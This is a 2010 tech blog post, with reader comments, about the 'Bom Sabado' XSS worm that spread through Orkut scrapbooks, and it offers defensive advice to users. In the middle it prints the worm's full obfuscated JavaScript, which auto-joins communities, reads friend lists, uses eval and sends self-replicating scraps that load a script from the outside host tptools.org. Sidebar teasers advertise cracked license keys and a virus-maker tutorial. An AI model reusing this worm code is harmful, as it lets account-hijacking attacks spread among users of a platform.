Recent Articles
Orkut attacked by 'Bom Sabado' worm
Saturday, September 25, 2010|
Surbhi Verma
‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’
Hi Friends, Did you find this scrap in your scrapbook from many of your friends??? If yes, then dont visit the profile of person from which this message has come, coz ur friend profile is now infected my a Virus named..‘Bom Sabado!’. If you visit any affected profile, your profile and ur system will also get affect by this Virus!!!
What is ‘Bom Sabado!’?
'Bom Sabado' is a new worm of type XSS (cross-site scripting) attack, which is created by keeping total focus on Orkut.
'Bom Sabado' is a Portuguese word which means 'Good saturday.'
Only one country is there in which Orkut is still no. 1 in social websites, So it is assumed that someone has made this virus to attack on the popularity of Orkut.
How it works?
When any one open page that is infected by this worm. A JavaScript(form http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) will run automatically.which will automatically join some communities and send scrap to your friends with text “Bom Sabado!” with a iFrame code which load that JavaScript again for your friends and they will join communities and send links to their friends. Also this worm steal cookies from your browser.
Orkut has Temporarily Fixed the issue.
On Orkut Support Forums, its declared by a 'Top Contributor' that Orkut has Temporarily Fixed the issue.
Here what can be meant by temporarily... what i guess.. they have only removed the java script from the site http://tptools.org, but it will take time to Fix this 'Hole of Orkut' to save Orkut in coming times. so Just Be Aware!!!
I will suggest you all to Disable JavaScript of your Browser, to avoid this type of problem :)
Suggestion for users Affected by Bom Sabado
As This virus steal cookies from browser, so it is suggested to clear ur browser's cookies immediately and change your all passwords.
Coding of Bom Sabado Worm taken from http://tptools.org/
var _0x37a1=["\x4D\x69\x63\x72\ x6F\x73\x6F\x66\x74\x2E\x58\ x4D\x4C\x48\x74\x74\x70","\ x50\x4F\x53\x54\x5F\x54\x4F\ x4B\x45\x4E\x3D","\x43\x47\ x49\x2E\x50\x4F\x53\x54\x5F\ x54\x4F\x4B\x45\x4E","\x26\ x73\x69\x67\x6E\x61\x74\x75\ x72\x65\x3D","\x50\x61\x67\ x65\x2E\x73\x69\x67\x6E\x61\ x74\x75\x72\x65\x2E\x72\x61\ x77","\x50\x4F\x53\x54","\x53\ x63\x72\x61\x70\x62\x6F\x6F\ x6B\x3F","\x6F\x70\x65\x6E","\ x43\x6F\x6E\x74\x65\x6E\x74\ x2D\x54\x79\x70\x65","\x61\ x70\x70\x6C\x69\x63\x61\x74\ x69\x6F\x6E\x2F\x78\x2D\x77\ x77\x77\x2D\x66\x6F\x72\x6D\ x2D\x75\x72\x6C\x65\x6E\x63\ x6F\x64\x65\x64\x3B","\x73\ x65\x74\x52\x65\x71\x75\x65\ x73\x74\x48\x65\x61\x64\x65\ x72","\x26\x73\x63\x72\x61\ x70\x54\x65\x78\x74\x3D","\ x3C\x73\x74\x79\x6C\x65\x2F\ x3E\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x74\x79\x6C\x65\ x3D\x64\x69\x73\x70\x6C\x61\ x79\x3A\x6E\x6F\x6E\x65\x20\ x6F\x6E\x6C\x6F\x61\x64\x3D\ x22\x61\x20\x3D\x20\x64\x6F\ x63\x75\x6D\x65\x6E\x74\x2E\ x63\x72\x65\x61\x74\x65\x45\ x6C\x65\x6D\x65\x6E\x74\x28\ x20\x27\x73\x63\x72\x69\x70\ x74\x27\x29\x3B\x61\x2E\x73\ x72\x63\x20\x3D\x20\x27\x2F\ x27\x20\x2B\x20\x27\x2F\x74\ x70\x74\x6F\x6F\x6C\x73\x2E\ x6F\x27\x2B\x27\x72\x67\x2F\ x77\x6F\x72\x6D\x2E\x6A\x73\ x27\x2B\x27\x23\x3C\x77\x62\ x72\x3E\x23\x27\x3B\x20\x64\ x6F\x63\x75\x6D\x65\x6E\x74\ x20\x2E\x20\x62\x6F\x64\x79\ x20\x2E\x20\x61\x70\x70\x65\ x6E\x64\x43\x68\x69\x6C\x64\ x28\x20\x61\x20\x29\x22\x3E\ x3C\x2F\x69\x66\x72\x61\x6D\ x65\x3E\x42\x6F\x6D\x20\x53\ x61\x62\x61\x64\x6F\x21","\ x26\x75\x69\x64\x3D","\x26\ x41\x63\x74\x69\x6F\x6E\x2E\ x73\x75\x62\x6D\x69\x74\x3D\ x31","\x73\x65\x6E\x64","\x47\ x45\x54","\x52\x65\x71\x75\ x65\x73\x74\x46\x72\x69\x65\ x6E\x64\x73\x3F\x72\x65\x71\ x3D\x66\x6C\x26\x75\x69\x64\ x3D","\x75\x69\x64","\x26\x6F\ x78\x68\x3D\x31","\x77\x68\ x69\x6C\x65\x20\x28\x74\x72\ x75\x65\x29\x3B\x20\x26\x26\ x26\x53\x54\x41\x52\x54\x26\ x26\x26","","\x72\x65\x70\x6C\ x61\x63\x65","\x72\x65\x73\ x70\x6F\x6E\x73\x65\x54\x65\ x78\x74","\x43\x6F\x6D\x6D\ x75\x6E\x69\x74\x79\x4A\x6F\ x69\x6E\x3F\x63\x6D\x6D\x3D"," \x26\x41\x63\x74\x69\x6F\x6E\ x2E\x6A\x6F\x69\x6E\x3D\x31"," \x31\x30\x36\x36\x39\x38\x38\ x30\x38","\x36","\x35\x35\x38\ x34\x39\x34","\x31\x30\x36\ x36\x39\x38\x36\x32\x38","\ x31\x30\x36\x36\x39\x31\x33\ x34\x31","\x76\x61\x72\x20\ x66\x72\x69\x65\x6E\x64\x73\ x20\x3D\x20","\x3B","\x6C\x69\ x73\x74","\x64\x61\x74\x61","\ x69\x64"];function createXMLHttpRequest(){try{ return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+ encodeURIComponent(JSHDF[_ 0x37a1[2]])+_0x37a1[3]+ encodeURIComponent(JSHDF[_ 0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 5],_0x37a1[6],false);_ 0x7c2bx5[_0x37a1[10]](_0x37a1[ 8],_0x37a1[9]);_0x7c2bx5[_ 0x37a1[15]](data+_0x37a1[11]+ encodeURIComponent(_0x37a1[12] )+_0x37a1[13]+_0x7c2bx4+_ 0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 16],_0x37a1[17]+JSHDF[_0x37a1[ 18]]+_0x37a1[19],false);_ 0x7c2bx5[_0x37a1[15]](null); return (_0x7c2bx5[_0x37a1[23]])[_ 0x37a1[22]](_0x37a1[20],_ 0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5= createXMLHttpRequest();_ 0x7c2bx5[_0x37a1[7]](_0x37a1[ 5],_0x37a1[24]+_0x7c2bx8, false);_0x7c2bx5[_0x37a1[10]]( _0x37a1[8],_0x37a1[9]);_ 0x7c2bx5[_0x37a1[15]](data+_ 0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM( _0x37a1[27]);joinCMM(_0x37a1[ 28]);joinCMM(_0x37a1[29]); joinCMM(_0x37a1[30]);eval(_ 0x37a1[31]+requestFriends()+_ 0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[ 33]]){uid=(friends[_0x37a1[34] ][_0x37a1[33]][x]);sendScrap( uid[_0x37a1[35]]);} ;
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
All readers are most welcomed to share their experience with these kind of Viruses attacks!!!
Posted in
Orkut Tips
6 comments for this post
Leave a reply
Subscribe to:
Post Comments (Atom)
TechByte4U on Facebook
Popular Posts
How to get Account on Google+ ? get google plus invitation Hello All, Google+ is still available using the invitation process, It wi...
In response to query asked by Ameer Hasan Malik Did you forget your windows login password? or want to access Admin account in schoo...
Free winrar, Full version Winrar, Winrar Serial key I guess everyone know what is Winrar, and what it works. So without going into t...
Google Chrome was one of the first browsers to have multiple processes, which creates a separate process for each tab. That means ...
Hey Friends, Download Paid version of AVG 9.0 antivirus for free with 8 yeas licence and save $240...... Features of AVG paid ve...
In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares named "JPS Virus Maker" an...
Hello friends, Today i am gonna provide you genuine keys for windows 7. People who dont know how to how to make your window genuine by repla...
In response to query asked by SUNNI BALA SANKAM Windows 7 has implemented addition secur i ty mechanism to prevent accidental or...
How to inverse colors on a Picture. " Stare at the image then close your eyes, you will see Jesus." When first time I sa...
This is the most common issue, that you have deleted some important files from your system, that you didnt actually want to. Don'...
deepa kashyap
September 25, 2010 at 4:45 PM
hey thanks a lot as i checked my scrapbook i saw msg like that only ‘Bom Sabado' i was about to scrap him what does it means, in the meanwhile checked your post and oo god that's virus attack !!
what if i will hide that scrap??
Sn34k3r
September 25, 2010 at 7:53 PM
"Bom Sabado" Bug Creating Problems in Orkut
what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!
Today in morning i saw every account was posting scrap some thing like bomb amungu or Bom Sabado.
And thos who all are reading this scrap even in their profile, their cookies are also stoled and so they are also posting scrap automatically to their friend list same scrap as bomb something like :(
The script is runnign on and also in status of profile their flag is coming. i mean status are automatically updated in some profile. Its their flag of Brazil. Already Google team are working on it.
By the Bom Sabado means Good Saturday
Currently what u should do is
Solutions:-
Follow these steps:
1. Immediately change your password and security question{ including secondary email and mobile number if they also got changed.) This will solve the problem.
2. Find out whether some communities has been joined automatically. if yeah, do remove them.
3. If your account has been completely hacked, see here:
http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
4. Always remember these points :
4.1 Donot ever login to any site rather than www.orkut.com
4.2 Donot ever run any javascripts while logged into your orkut account
4.3 Never use any flooder in your account
4.4 Donot ever share your password with anyone else and keep changing your password regularly.
4.5 Donot ever click suspicious link while logged into Orkut a/c. if you are curious you can copy the link and check them in
other browser after cleaning it's browser's cookie and cache.
4.6 Donot ever install any suspicious script on greasemoneky and ALWAYS DIABLE THE GM before logging in to orkut.
4.7 Do your mobile verification also, so that you can get back your a/c if hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings
4.8 Install a good Update Ant ivirus and Anti Key logger and keep your system free from Key loggers and backdoor trojans.
4.9 Use Virtual Keyboard to enter your password for more securite. KIS 2010 provides it and there are many other V.
keyboards available.
Take a look here and follow the points given to protect your a/c:
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
and
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
hope this helps you...;)
happy Orkutting..
Surbhi Verma
September 26, 2010 at 12:09 AM
@Deepa....No need to hide scrap, the problem is fixed now :)
But be aware for future.. never check the affected profile in future, if again this type of msg come!!!!
sudhansh jain
September 26, 2010 at 7:44 AM
Yeah i have also got some scraps like that ...but thnk god my profile is not affected by that!!
LoGaN
September 26, 2010 at 5:03 PM
If the browser is ran sandboxed, with that "Sandboxie" tool you gave, will it prevent the system from virus or the orkut profile to any extent ?
Surbhi Verma
September 28, 2010 at 8:20 PM
@Logan... very gud question....
well in these types of attack in which the hacker steal cookies of browser, then sandboxie could not also protect the users, coz if u run your browser in sanbox, still then if u keep save passwords, then it will be accessible by sandbox means it can be hacked by cooking stealer's.